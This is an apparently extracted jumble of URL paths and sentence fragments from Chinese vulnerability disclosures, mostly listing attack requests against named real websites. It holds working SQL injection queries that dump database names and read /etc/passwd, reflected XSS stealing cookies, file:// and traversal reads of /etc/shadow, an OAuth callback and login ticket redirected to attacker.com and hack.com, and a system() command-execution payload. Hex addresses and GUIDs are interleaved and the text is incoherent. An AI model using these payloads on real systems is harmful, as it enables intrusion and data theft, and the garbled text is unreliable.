/parse_share.do /parse_share.do?link=http://2130706433 /parse_share.do?link=http://2130706433:8080 /parse_share.do?link=file:///etc/passwd /parse_share.do?link=file:///etc/sysconfig/ /parse_share.do?link=file:///etc/shadow /parse_share.do?link=%3Cinput%20onclick=alert('Hola!wooyun!')%3E /transactions_team.php文件“id”参数,没有对用户提交的数据作过滤,导致注入漏洞。 0023:89441428= /invite/friends.php存在好友信息 /simp_search.php?locationid=1&subcatid=27&manuid=0&keyword= /cbportal/userinfo/showRegister.action /sp1/act/chartmall.chart.action /cbportal/userinfo/showRegister.action /autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback /autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback /autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback /forums/tag.php文件中的srchuid存在SQL注入 /xxx.png这个格式,如果字符串的起始于结尾都不符合,就会清空,比如javascript伪协议,双引号等 /web/updateInfo.action?modifyType=%27;alert%28/aa/%29;a=%27 /comment/list /cgi-bin/login?fun=passport&target=MLIST&t=login.js&pagesize=10&resp_charset=UTF8 /cgi-bin/mail_list?flag=new&s=unread&folderid=8&folderid=1&folderid=3&folderid=user&fun=slock&sid=KCSRLFNrsbsbsbsCR9TjJR1djyz&pagesize=10&resp_charset=UTF8&t=mail_list.js 0023:81123880=00000937 0023:81123880=00000937 00015BE4 00015BD7j 00015BE4 00015BE7 00015BED 00015BF3 00015BF4 00015BF5 00015BFA 00015C00 00015C01 00015C06 00015C09 00015C0F 00015C11 00015C17 00015C18 00015C19 000107B0 00015C01p 000107B0 000107B0 000107B0 000107B0 000107B2 000107B3 000107B5 000107B8 000107BB 000107BD 000107C0 000107C0 000107C2 000107C5 000107C7 000107CA 000107CC 000107CD /viewUser.action?id=6220 /zhuanti/admin/user_zhuanti.php?pagedata=1&chooseid=1&update=1&id=21791#input /septwolves/play.php?vid=90 /Member/RemindPWD.asp?email=&uid=&signin_logintype=&done= /reader/j_mkdir www.douban.com的ck值相同并在一个session中保持一致 /Deal_Cookies.asp?nexturl= / /nginx-securit.html xunlei.com/movie/public_html/movie_search_new.php 
xunlei.com/movie/public_html/movie_search_new.php /report/accounts/checkLogin?password=xx&username=xx /ucpack/dlmobile/control/generic_packs.php?pc=999 /uinfo/?callback=requestImstate&type=json&uids=25481a89e4bdef294e4aeab9&randin=1923658608&detaillen=256&t= hi.baidu.com/可爱兔唐雯玉 /nginx-securit.html /playvbox/%E9%9B%AA%E3%80%81%E6%97%A0%E9%9F%B3%E3%80%81%E7%AA%93%E8%BE%BA%E3%81%AB%E3%81%A6/?zd=0&start=0&ourl=http://www.baidu.com/ /fuxudong/blog/item/d918d7ddb66624e276c638d6.html /user_look.aspx?ID=axyypy /traf/ http://utility.baidu.com/traf/detail.php?aid=215 /do/add?it=&iu=!-- / /robots.txt /destguides/journals/AllSingleJournals.aspx?Writing=130079%27%273 /admin/index.php /workroom.php)第三方开发团队“潮流少年工作室 /forum.php?mod=viewthread&tid=1632898),因变量未初始化及过滤不严导致SQL注入及跨站脚本漏洞。 moodwall_inc_php_2 /newhot/admin/login.jsp /admin/ /last.php?aname=pps&p=zsshs / /news.php?doc=36674 /news.php?doc=36674 expression(window.open(somewhere)),就能让被攻击者在已被block的情况下点击页面任意位置触发弹出窗口 /lists.php?tag=whhyn /lists.php?tag=whhyn /admin/main.php /admin/main.php /service/account/check_with_js?return_to=http://www.douban.fm ?sig=67a2f068bc&response_nonce=1281936632&data=%2B%7C%81%21%D7%5D%AB%5B%AD%FCM%9F%0E%F75t0%2C%FFJ%8Fw%C6P%1A%B3F%16%A2%82%15%15%84%D4Vz%8C%9B%85g+%C3%C6%5D%FED9%96%84%D4Vz%8C%9B%85g+%C3%C6%5D%FED9%96&mode=id_res&return_to=http%3A%2F%2Fwww.douban.fm /ptlogin/ac/v7/js/xui.js /breachme/blog/item/bd11aa194c10db77dab4bd33.html /breachme/blog/item/0173d5441467ed41510ffe8a.html /search_result.php?company=%282015081%29%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20where%20table_schema=database()-- /breachme/blog/item/bf51c11384d7178d6538db93.html /amSynth/?p=../../../../../../../../../../../../etc/hosts%00 /amSynth/?p=../../../../../../../../../../../../etc/fstab%00 /show?a=a%3Cscript%3Ealert%281%29%3C/script%3E&r=http://www.renren.com&type=single 
/breachme/blog/item/9465ee311622c8a55edf0ef4.html /w2i/w2iwemarry/w2iWeMarryPl!list.action?imgid=1424%20and%201=1 /w2i/w2iwemarry/w2iWeMarryPl!list.action?imgid=1424%20and%201=2 http://toolbox.youdao.com/searchcode/iframe?style=4&product=blogsite&defaultProduct=blogsite&borderColor=ffffff&bkColor=FFFFFF&formWidth=232&domain= alert("XSS") /search.php?&gameName=%27and'1'='1 /bin F43B35B7-C29A-453F-86E9-C37412269D62 /error_report/error_report.php?title=1&contentid=1 /volunteer/act_alert.htm?org_id=152&act_id=523&titlename=%u8BA9%u6148%u5584%u6210%u4E3A%u4E00%u79CD%u5E38%u6001%u7B2B011%u671F%3Cscript%3Ealert%28%27s%27%29%3C/script%3E / /admin/login.aspx 122.225.103.104 /xwzx2.asp?id=42&id2=259 /news_show.asp?id=282 /pagecontent.asp?menu1=57&menu2=58&id=6 /aboutus.asp?id=449 /news/index.asp?classid=238 /modify_all.php?searchphone=a /modify_all.php?searchphone=a /modify_all.php?searchphone=a /modify_all.php?searchphone=a expression(alert(/深职院/)) /?id=mm3'+and+'1'%3D'0中的id参数过滤不严,导致SQL注入漏洞,但冒似淘宝对数据库的错误机制进行处理,导致网页返回正常页面,但仍可直接通过注入猜解工具直接获取帐号及密码。 /api/fusioncharts/get_from_data.php?sid=48302&aid=18099&jsoncallback=jsonp1282643851243 /download/search.php?f_name=0;URL=http://www.geovisioncn.com/news /manage/module.do?m=preview&type=pp_slide&data= /logo.gif /index.php?do=Phone.List&fid=1&t=8%3Cscript%3Ealert%28%27s%27%29;%3C/script%3E /index.php?do=Phone.List%27&fid=1&t=8 /downAction.do?file=../3g/zst/showimg.jsp /breachme/blog/item/37c7bb50c2bad5521038c2bb.html /bk.jsp?title=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22 /supermarket/zonemap/zonemap.asp页面的city参数过滤不严格 /room/space.php?sid=1000040123&tab=2';%3C/script%3E%3Cscript%3Ealert('by%20pandora%20');%3C/script%3E%3Cscript%3E /classic/rdMail.php /classic/rdMail.php /v1/user/userinfo?u=611991217;alert(/ss/) /v1/user/userinfo?u=611991217;var 
/v1/user/userinfo?u=%36%31%31%39%39%31%32%31%37%3B%76%61%72%20%73%74%72%3D%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3B%76%61%72%20%65%73%3D%2F%75%72%6C%3D%2F%3B%65%73%2E%65%78%65%63%28%73%74%72%29%3B%76%61%72%20%72%69%67%68%74%3D%52%65%67%45%78%70%2E%72%69%67%68%74%43%6F%6E%74%65%78%74%3B%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%72%69%67%68%74&url=http://www.hao123.com /v1/user/userinfo?u=611991217;window.location.href=0x12 /Vote.aspx?ballotid=6012 /shequ/mu_center/muc_mymusic.php /qn_search/cxzl_ss.jsp?searchWord=%22%2F%3E%20%3Ciframe%20src%3D%22http%3A%2F%2Fwww.baidu.com%22%20width%3D800%20height%3D300%3E%3C%2Fiframe%3E /Support/Export/show/?place_name=39%CB%D1%CB%F7%A3%AD%D7%F3%B1%DF /Support/Export/show/?place_name=39%CB%D1%CB%F7%A3%AD%D7%F3%B1%DF /luren110/a_5898108.html /zhanshi_info.php /zhanshi_rate.php FAC87377-9586-4C72-A614-8C9B3CA1BF5B /list.php?keyword= /list.php?tag=%B4%F3%C8%FC /list.php?client=13&clientname= /list.php?keyword= 30A3ACF9-DA6E-4CA0-A081-E06282DF1C64 /market/center.php?action=list&trade_type=&goods_type=1 /Default/Login /edifier/?q=d /edifier/ /?area=bizsearch&cmd=bigmap&city=%E5%8C%97%E4%BA%AC&a=%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&q=%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&fm=bd_sina_search /search/search.jsp?key= /search/SearchResult.jsp?key=%27%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E /qihoo.aspx?kw=hj /openfund/show_news.asp?id=2765 /bluevip/jqbgjx_xx.asp?articleid=39还有众多文件,几乎全部没有过滤,虽然用了防注程序,但是不验证cookies的提交方式,导致可以cookies注入,不过数据库为access,并且无法获取到表名,所以暂时不能利用此注入获取敏感信息 /Search.aspx?keyword=sdfsd /ria/login.php /breachme/blog/item/d94767fa81dc5c879e51463b.html /games.enet.com.cn/zhuanti/zx/action/article_v.shtml?id=102929 /?FoxNews=123.html),但分析得不够详细,利用方法也稍显麻烦,这里给出的利用方式更简单。 /?FoxNews=123.html),但分析得不够详细,利用方法也稍显麻烦,这里给出的利用方式更简单。 /show.php/?id=17808 /breachme/blog/item/0173d54455dd2242510ffe10.html /news/showdetail.php / /breachme/blog/item/b478c950b476e06c84352467.html 
/breachme/blog/item/3b3a88b43412127d8ad4b22a.html /r/video/static/swf/amuse_index.swf?funcGetData=alert%28/yyy/%29 /cio/erp/index7.jsp?id=1038 /!music/!player/p.php?&mids=3113856%27%29;alert%28document.cookie%29;if%28%27 /loreal/s.php?id=111%20and%201=2%20union%20select%201,user(),database(),4,5,6,7,8 /breachme/blog/item/02f35d240e909e3dc89559e1.html ModLoad ModLoad ModLoad 0023:4141413d= /opta/live.php?id=f133588'%20and%20'1'='2'%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,version(),13,14,15%20%20/*%20and%20'1'='2 www.youdao.com /search?q=beyond& /skinchooser?back_url=http%3A%2F%2Fwww.youdao.com%2Fsearch%3Fq%3Dbeyond%26%22%3E%3Cscript%3Ealert%28%27ok%27%29%3C%2Fscript%3E /activity.php?action=one_act&platform_id=1 /activity.php?action=one_act.php /con/default/act/imginfo?id=9553&type=1 /user_chk_reg.php?sort=u&user=aaaaaa%27 /download/downpage/themedown/id/1500227'/mid/144 /download/downpage/down/subid/1500231/id/1500227'/mid/144 /bug.php?action=view&id=545 /tongyongqiche/bigimg.php?id=1855 /tongyongqiche/bigimg.php?id=1855 /tongyongqiche/bigimg.php?id=1855 /single/servlet/main?force=true /test.js /picshow/showplayer.php?id=14314%27 /more/star07.php?offset=%3Cscript%3Ealert%28/liscker/%29%3C/script%3E /get_thread_list.php?subdomain=comments /get_thread_list.php?subdomain=comments /get_thread_list.php?subdomain=comments /diannao/?%E7%B1%BB%E5%9E%8B=&query=%3Cscript%3Ealert%2844%29%3B%3C%2Fscript%3E&cater=diannao /upload/201009191205373314.jpg minisite.it.sohu.com/minisite/site921/show.jsp?id=475170 minisite.it.sohu.com/minisite/site921/show.jsp?id=475170 /mutually_help_null.shtml?query=%3Cscript%3Ealert%281%29%3C/script%3E /script/user/cj/getpagecj.php,参数usrid可sql注入 /fengyun/gameredi.jsp?url=www.google.com /con/award/act/search?code=1%20and%201=2%20union%20select%20SCHEMA_NAME%20from%20INFORMATION_SCHEMA.SCHEMATA-- /callback.do?t=93b7c5177cf98b843ff90233020e13291&origURL=http://www.baidu.com/ 
/index.php?c=error&a=render&errno=%3Ciframe%20src%3D%22http%3A%2F%2Fwww.baidu.com%22%20width%3D800%20height%3D300%3E%3C%2Fiframe%3E /mpnhudong_content.jsp?id=44 /search.php?key=xx /c/searchone?search=1329517103 /c/searchone?search=1329517103 /kws/feedback2/his.php?app=2+and+1=2+union+select+1,2,3,4,5,database(),user(),8,9/*&uuid=622D988684F34161BC09E869DB38BF3B / / / / /plaf/login.jsf /plaf/caslogin.jsf /rights.html /cgi-bin/query / / /findluxstar/find-star/show.php?act=uname&q=w'/**/AND/**/0/**/Union/**/SELECT/**/1,2,user(),4,database(),6%23 /?controller=member&action=detail&id=109 /man/user-login.php /haier/zhengming/detail.php?id=4554 /submit/login.php /GGBJ/login.php?phone=sefrefwe /download/dosearch.php?key=w&mod=book&class_id=1 /helpinfo/faq/wenti.asp?id=10197 /user/reg/infoshow.do?u=&passport=&sappid=&type=&appdata= /listing.php /beijing/life/?promoteid= /?userid=&appid= /poetry/?page=..%2F..%2F../..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 /edit_article.php?para=0&name=%B4%BA%B7%D6 /edit_article.php?para=0&name=%B4%BA%B7%D6 /edit_article.php?para=0&name=%B4%BA%B7%D6 /attachments2008@see/month_201010/naipin_bug.7z /forum/forum_show.htm?threadId=%22%3C/script%3E%3Cscript%3Ealert%283%29%3C/script%3E /dragon/admin/commend_list.php?classid=9%20and%201=2%20union%20select%200,unhex /communion/showpic.php?consortiaid=2'%20and%203=8%20union%20select%201,2,3,4,5,6,7,user(),9,10,11,12,13,14,15%20--%20And%20'8'='11 /zhenguoli/info.php?id=116%20and%201=2%20UNION%20SELECT%201,user%28%29,3,4,5,6,7,load_file%280x2f6574632f706173737764%29,9,10,11 /unionnews/unionNewsInstenceAction.do?forward=/jsp/cbpeachdak/../zxsmile/&newsid=2630 /news/FindNewsAction.do?id=358&forward=news/ /3g/pro/index.php?sa=t254d1293v446&wm=5223?amp;iwRet=%22%3E%3Cscript%3Ealert(21)%3C/script%3E%3C%22&sprefer=sysi01&sid=7e747986b2ac7930&iwRet=true /showdiary.php /v/v.php?viewkey=SINA_159_b5c824b3531cd321a1f7 /stock/code.php?code= /url114.php?MT= /ruyanshihe/pic/item/a0119cecc26a407179f0555c.jpg /ad.htm?a 
/robot/repositoryBrowse.jsp?title= /coolypf/blog/item/f88b3839bc2f9b2bb8998fd0.html /search?keyword= /search/no_result?keyword= /nokiax6/play.php /philips/ASX/play.php?page=2&saiqu=%E9%83%91%E5%B7%9E&videourl=XMTczNzI4OTg0 /t2211/video.php /video.php?id=XMTY4MTk0NDQw /4209140.js /4209140.js /wc/service/video_guess_vote.php?id=1/1,2/1&flag=1 /wc/news.php?id=1%20and%201=0-- /con/default/act/darenmypage?id=9553-1 /con/default/act/darenmypage?id=9553-2 /con/default/act/darenmypage?id=9553-3 /sso_admin/user/user_forgetPassword.do?passwordBean.name=xxx /haier/zhengming/detail.php?id=4554 /callback,并携带oauth_verifier此参数,攻击者可获得并利用此参数访问合法callback即可实施攻击,从而达到session /oauth/authorize?oauth_token=AA&oauth_callback=http://attacker.com/callback /advisories/2009-1/ 2D360201-FFF5-11d1-8D03-00A0C959BC0A 4:number 4:age 5:number 5:age 6:number 6:age 7:number 7:age 8:number 8:age 9:number 9:age 10:number 10:age 11:number 11:age 12:number 12:age 2D360201-FFF5-11d1-8D03-00A0C959BC0A 2D360201-FFF5-11d1-8D03-00A0C959BC0A 2D360201-FFF5-11d1-8D03-00A0C959BC0A /lushu/show?id=9a8080a72af7fa29012afa7894f83a59 /redirect.do?url=http://99mf.net /xn6205.do?ss=a&rt=a&g= // /Product/SearchNew.aspx?new=1&k=aaa /p4p/alimama/faq.php?pageName=http://ha.ckers.org/xss /aboutus/ad/tvArticle.jsp?typeId=13 /main/adfclick?db=ctrip&bid=78,4604,9473&cid=0,0,0&sid=15154&advid=5&camid=116&show=ignore&url=http://www.baidu.com /partners/directory/particular/0%20or%200%20union%20select%201,GROUP_CONCAT%28SCHEMA_NAME%29,3,4,5,6,7,8,9%20from%20information_schema.SCHEMATA%23 /p_cs_outlet_shops_tc.jsp?mainDistrict=kl /templet/shmm/shmmSingleGoods/shmmGoodsFrame.jsp?goodId=20000526&goodType=900016 /ctripmember/journals/preview.aspx /aqli.php /7d_splb.php?type=id&cid=1 /search?q=%22%3E%3Chr%20onmouseover=alert(1)%3E /user/history?id=512655736%22%3E%3Chr%20onmouseover=alert(1)%3E%3C%22 /partner?bizvenue=http://jiepang.com/venue/A5E2C2E92C447068%22%3E%3Cinput%20onmouseover=alert(1)%3E%3C%22 
/user/login?back_url=/user/resetpassword /user/login?back_url=/user/%22%3E%3Cinput%3E%3C%22 /kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 /vulndb/20050/ name name /login.php /girl.php?userID=1191 /showReward.php?&cardType=1%27 /http://fanfou.com/这样的形式绕过 /opus_detail.do?sid=e441a73c442b09562d26655d6d593369'%20and%201=2%20union%20select%201,2,3,@@version,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5-- /my/channel/item.srv?icode=enQCgQKJTDs&callback= /javascript /toby57/blog/item/686b70ece294cfdc2f2e2183.html name name /bbs_new/app/src/main/?action=list /bbs_new/app/src/include/db/DB.inc /bbs_new/app/src/include/db/DBError.inc /search_video/q_%5C%22%20style=%7Bleft:expRessioN%28alert%281%29%29%7D%3E%3C!-- /?somecode=some&somecode2=loooooooooooooooooooongcode red /recommend/widget?src=alert()&title=abcdefg&a;alert(document.cookie)//=fff /search/search.php?k= /css/img/ztlogo.jpg/1.php /video.php?id=457242%20and%201=2 /test.php /news/hooscargame/pt_main.php?photourl=http://www.l14of.com//xx.gif /search/search.php?prod_id=1289 1.gif.php//////////////////////////%00 /jsp/work/viewChange.jsp?orderid=11233&verid=4 /count?t=mpxO9OGMWPcv5LJ6e7CS&title=%E6%9D%8E%E5%AE%81&backurl=http://t.qq.com/gaoshang /memeber/item_0db1-25078006/&cid=&url=832432.html /memeber/item_0db1-25078006/&cid=&url=832432.html /sso/login.php?gateway&url=//t.qq.com/gaoshang /passport/cookie/clearit.aspx?ReturnUrl=http://www.baidu.com /passport/www/reg_fast.aspx?returnurl=http://www.baidu.com /item.taobao.com/item.htm_id=7941465197/%2e%2e/%2e%2e/sso/login%2ephp?gateway&url=//t.qq.com/gaoshang /admin/ /?ss=17043&rt=2&g=mt /news.php?id=20 /groupshow.php?groupid=115 /register/ /bbs/edituser.asp /gc/search.php /cgi-bin/content_new?tid=12855973215013577&num=20&order=0&fid=350&mypn=%A1%B1%3E%3Ciframe%20src=%22//%22&start=0&pn=1&gb=1&curpn=1 /?op=logout&destUrl=http://www.baidu.com /shoes?qp=%3Cscript%3Ealert(/Alan/);%3C/script%3E /shoes?qp=%3E%3Ciframe%20src=http://www.baidu.com%3E 
/cbportal/userinfo/showLogin.htm?backUrl=%22%3E%3Ciframe%20src=http://www.baidu.com%3E%3C/iframe%3E /cbportal/userinfo/showLogin.htm?backUrl=%22%3E%3Cscript%3Ealert(/Alan/)%3C/script%3E /ns?word=%B7%F5%BB%AF%BB%FA&ie=gb2312&cl=2&rn=20&ct=0&tn=newsrss&class=0+word=%B7%F5%BB%AF%BB%FA /requestlog?url= /price/%3f.jsp /NotLogin.do?m=login&url=%3Cscript%3Ealert(/Alan/);%3C/script%3E /NotLogin.do?m=login&url=%22%3E%3Ciframe%20src=http://www.wooyun.org/whitehats/Alan%3E%3C/iframe%3E /gate/big5/soft.ifeng.com/wap2/soft.jsp?id=86 /gate/big5/之后的内容 /my_info.xhtml?c=account /wow/talents/cn3.2.2/talents.php?b=9 /wow/talents/cn3.2.2/view.php?id=19436 /ref.php?return_url= / /equipShow.aspx?nid=140 /%3f.jsp /default/%3f.jsp /search.php /wap20/index.jsp?mid=5see9K&ch=ifengweb&vt=2 /system/work.php对author变量过滤不严 /system/work.php?author= /crossdomain.xml /has_client/whois1.asp?tongyong=yes&domain=xxx&code=0000 /downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314&displaylang=en / wanmei.com jsp /index.htm?right3=yykf.htm /info/open.asp?id=375 /click.php?site=jiaoyou /click.php?site=jiaoyou /url_check?appid=99&url=http%3A%2F%2Fwww.324324.cn%2Flevel /entries/492230/rating/did/page11 /emidas/sh_search.php?page=1&m_class=19%20and%201=1 /emidas/sh_search.php?page=1&m_class=19%20and%201=2 /kfc/couponAction!getCode?prizeType=1 alert /so?k=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastkey=%3Cscript%3Ealert%28%2F1%2F%29%3C%2Fscript%3E&c=&searchlable=0&sort=&s=content /c/person?id=-42984%20union%20select%201,2,3,4,5,6,7,8,9,10,11,concat /goSearch.sip?cate=911192&item= /common/modules/dmc/house_search/搜索框输入 /app1/query.up?code= /yh/foreign_query.php?action=4 /searchResult.htm?Search= /search.sip?pageNo=1&onePageNum=12&type=1&fulltext= /jsp/system/index.jsp?err=1 /help/wap/.svn/entries /styles/CVS/Root /img/CVS/Root /jiemuinfo.php?id=21%20and%201=2%20union%20select%201,user(),3,4,5,database(),version() 
/c?m=9f65cb4a8c8507ed4fece7631054973b4f13d1252bd7a7572e96ce0a84642c101a39fec47a724b5a84d87e6502ae4c4bed84356537747af1c4969c0f80fbc4277cca656a27&p=8b2a955697934eac5cb7cc3f1c4f&user=baidu&fm=sc&query=apple&qid=f5e45bd805d29e80&p1=3&btViewPost= /i?cl=2&ct=201326592&fr=t5x /artist/tag/%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22 alert(/sogili/)[/img /like?url=http%3A%2F%2Fwww.swimmingacross.com%2Fdemo%2Flike.html%27%2balert%281%29%2b%27 /dkjs/detail.php?id=-9928'%20union%20select%201,2,concat /admin/login.php etupdate.gtja.com /callback.do?&origURL=http://hi.baidu.com/iv4n_fringe / /login?service=http://hack.com/getTicket.php /getTicket.php?ticket=*********************** /sharescript/messagebox.asp?info& /zonghe.php?keyword= /main/adfclick?db=ctrip&bid=44,6327,14034&cid=0,0,0&sid=18745&advid=5&camid=59&show=ignore&url= /index.php?keyword=&field=allname&mdir=search&mod=drug_search&x=0&y=0 /code/sendCode/ /search.do?action=SearchAll&keywords= /bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc /login.aspx /other/car_b.php?type=brand&l=A&b_id=20002 /include/Ajax.aspx?type=userid&userid=aaaaaa /cgi-bin/mini/list?key= /web/topic.asmx /UserService.asmx /web/topic.asmx?op=UpdateNickNamebyPassPort / / / / /info/ent.htm?location=&keyword=&abslink=&amlink=4 /flash_upload.php?modelid=1 /v?word=%27%22%3E%22%3E%3Cscript%3Ealert%28%2F222222222%2F%29%3C%2Fscript%3E&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800 /lib/car/suggest_jsonp.php?keyword=a&callback=%3Cscript%3Ealert%28%27s%27%29%3C/script%3E /reg/register.jsp /2010mini/gomeworldcup/information.php?id=3693%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,user%28%29,10,version%28%29,12 /reg/reg0_new.jsp?product=seasky%22;location.href='//diaoyu.163.com';product= /存在php解析漏洞,上传精心构造的图片会造成php解析漏洞,生成webshell /kf/AdClick.aspx?LinkID=3&goto=http://www.wooyun.org/ /ADRefererSystem/adjump.aspx?SndaADID=tuan-save-110117&RedirectUrl=http://www.wooyun.org/ /?words= /admin/ /search.html?search= 
/portal/search.htm?order=relevance&view=detail&action=Search&pge=1&positions=&trades=&locations=&publishDate=0&jobType=&salary=&companyType=0&grade=-1&keywords= /account/register.do?service=http://www.jobmd.cn/user/index.do /info/infosearch.htm?keyword= /search/2010csco.html?keyword=&type=all&action=Search&submit1=%E6%90%9C%E7%B4%A2 /index.php?ctrl=login&returnurl=%22'%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E /search.htm?p= www.wg365.com /index.php?sid=47669&lang=zh-Hans /www/delivery/ck.php?oaparams=2__bannerid=376__zoneid=79__OXLCA=1__cb=a33bac67e7__oadest= /tag.php?tag=%3Ciframe%20height=200%20width=300%20src=http://www.xfocus.net%3E /item.htm?id=8897422540 /item.htm?id=4064934291”,乍看之下没有什么问题,但是我们看一下代码你就明白了: /item.htm/item.php?id=4064934291才是他的真正网址,而其中2ejxzbh%2ecom这部分是经过编码的一级域名,解码后是jezbh.com, /item.htm/item.php?id=4064934291。 /cgi-bin/showchoice /cn/faq_info.aspx?id=21%20and%201=2%20union%20all%20select%201,2,3,4,5,6,user,@@version%20from%20Whir_U_Cjwt / /details.php?id=54 /class/fck/editor/fckeditor.html?InstanceName=ti_shi&Toolbar=Normal /admin/ /presend.php?id= /askquestion.php?asktitle= 9ff5c6d74f5efa31265e1c2f45e14349 /ip.jsp?q=shop.wanmei.com&x=32&y=14 /placeview?query=&call=goSearch /photo/ http://bbs.taobao.com/search/thread.htm?condition=post&q=x%250AContent-Type%253Amultipart%252frelated%253Bboundary%253Dx--x%250AContent-Location%253Aajax%250AContent-Transfer-Encoding%253Abase64%250d%250a%250d%250aPHNjcmlwdD5hbGVydCgib2siKTs8L3NjcmlwdD4%253D--x%250A!ajax http://bbs.taobao.com/search/thread.htm?condition=post&q=x%0AContent-Type%3Amultipart%2frelated%3Bboundary%3Dx--x%0AContent-Location%3Aajax%0AContent-Transfer-Encoding%3Abase64%0d%0a%0d%0aPHNjcmlwdD5hbGVydCgib2siKTs8L3NjcmlwdD4%3D--x%0A!ajax /.svn/entries /question/XXXXXXXX.html”之后加上“?zid=10081”,如“http://zhidao.baidu.com/question/XXXXXXXX.html?zid=10081”,回车。然后再回答问题,都可以被任务系统记作完成一个零回答问题(即使该问题事实上已经有人回答) /z/r/cadger/index.html 
/hotel/remote/livesearch.do?callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg /url=http://tu67.info/?sunkaisunkai /admin/index321.php?f_error= /admin/admin_login.html /interface/glogin.php?action=check&callback= /pcdown/progress?callback= /sso/crossdomain_all.jsp?action=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E /fulldisclosure/2011/Feb/199 /linx2008/blog/item/3655ba99309de11b6f068c46.html[可以看到广大群众关于此问题的讨论 /ma/enwiki/zh_tw/Byte-order_mark /news_nr.php?id=665%20and%201=2%20union%20select%201,user(),3,4,5,6/* /gate/big5/域名 /newleft/left_frame.php?channel=foo%cf%22;alert%281%29// /wp-content/themes/design/404.php /svn/trunk/js/navigatenormal.js?v=TueFeb152011.js /NZZl /2bEs F460ADF7-2BCD-4E82-B092-E570F8644638 /manage/newbook.php /2011-02-17/17/5075555a750f4ef2f56eac867beea498.jpg /search.asp?type=soft&k=%3Cscript%3Ealert%28%27frandy%27%29%3C/script%3E /vote_flash.asp?id=4262 /flash.rar 77910CD3-5447-4CCB-92DE-35BA8198BE81 /netwarn/alert/adminMain.do /index.html /home/,会随机进入到其他用户的账户里 /ipman/na/na_Raduis_home.do /3gstock/search/notfound.php?word=%3Cscript%3Ealert%28%27pg5yl8%27%29%3C%2Fscript%3E /topgene /yahoo/sb /yahoo/re?cid=0&page=1904& /admin/login/ /static/team/ alert(/sogili/)[/img /search.php?t=156&type=news&keyword= /news.php?sid=16&id=168/**/and/**/1=2/**/union/**/select/**/1,load_file(0x2F6574632F706173737764),database(),4,5-- / /cgi-bin/weiboshow?jsonp= /admin/articleList.php?channel=glm /ADRefererSystem/adjump.aspx?&RedirectUrl= /event.ng/Type=RawValues=&Redirect= /event.ng/Type=RawValues=&Redirect= /monitor/url_list.php?confirm=0&status=0&stime=2011-02-20+23%3A10%3A00&etime=2011-02-20+23%3A19%3A59 /robots.txt/s /robots.txt/s.php /robots.txt/s.php5 /tmp/php-cgi.sock /bugs/wooyun-2010-01334 /catalog/thread/508895-250539394.htm A74BF134-5213-46B5-AF36-CE1888315DC7 A74BF134-5213-46B5-AF36-CE1888315DC7 /vehicle/page/system/login.do 
/webchat/webIM/webAsk.aspx?gm=49&ar=1&sv=1&rgm=49'&rar=9999&rsv=9999';}alert('s');function /interface/share.php?share_content=sdfadsf"dfsdf /ADRefererSystem/adjump.aspx?SndaADID=tuan-sdo-110117&RedirectUrl=http://www.wooyun.org/ /r_os.aspx?gm=200009600&source=010101%27&t=Bambook%u5B98%u7F51%27 /?amp;=&bd_page_type=1&from=&pu=sl@1%2Cpw@1000%2Csz@240_320%2Cpd@1%2Cfz@2%2Clp@0%2Ctpl@color%2C&st=1&uid=wk_1296181240_378&ssid=%22%27%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E /main/s?border= /ips.jcp?callback=%3Cscript%3Ealert(1)%3C/script%3E /cgi-bin/download?qq=1.txt /favlink/1 /ajax/FavLink.ashx","ajaxMethod=updatelink&content=www.wooyun.org&id=5046105&link=http%3A%2F%2Fwww.wooyun.org&name=wooyun",function(x) id:5046105 /ajax/FavLink.ashx","ajaxMethod=updatelink&content=www.wooyun.org&id="+i+"&link=http%3A%2F%2Fwww.wooyun.org&name=wooyun",function(x) /photosrc/目录名/shell文件名可获得webshell /cyesis/dpage-limitlist.action?content=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIPT%3E&searchType=1 B965C48D-824F-4F30-A456-D03EC3F244EA /common/searchresult.html?key= /f/admin/listIPInfo.action / /search.php,在搜索框中输入: /static/hosting/ghosting.asp?showTop= /crossdomain.xml /crossdomain.xml php?id= songtaste.com www.songtaste.com的一台备份服务器,并且由于一些原因去掉了php的解析,而操作者很明显没有注意到该台服务器其中包含的php文件的泄漏问题。通过该问题和www上的一些应用逻辑,我可以下载到了任意的代码。 /administrator/ /administrator/lib/adodb_lite/adodb-perf-module.inc.php?last_module=Exception{};phpinfo();/* /administrator/lib/adodb_lite/adodb-perf-module.inc.php?d=w&last_module=Exception{};system(stripslashes($_GET[d]));die();/* 10003D4E 10003D4E 10003D4E 1000B3A4o 10003D4E 1000B41Co 10003D4E 10003D4E 10003D4E 10003D4E 10003D4E 10003D52 10003D54 10003D56 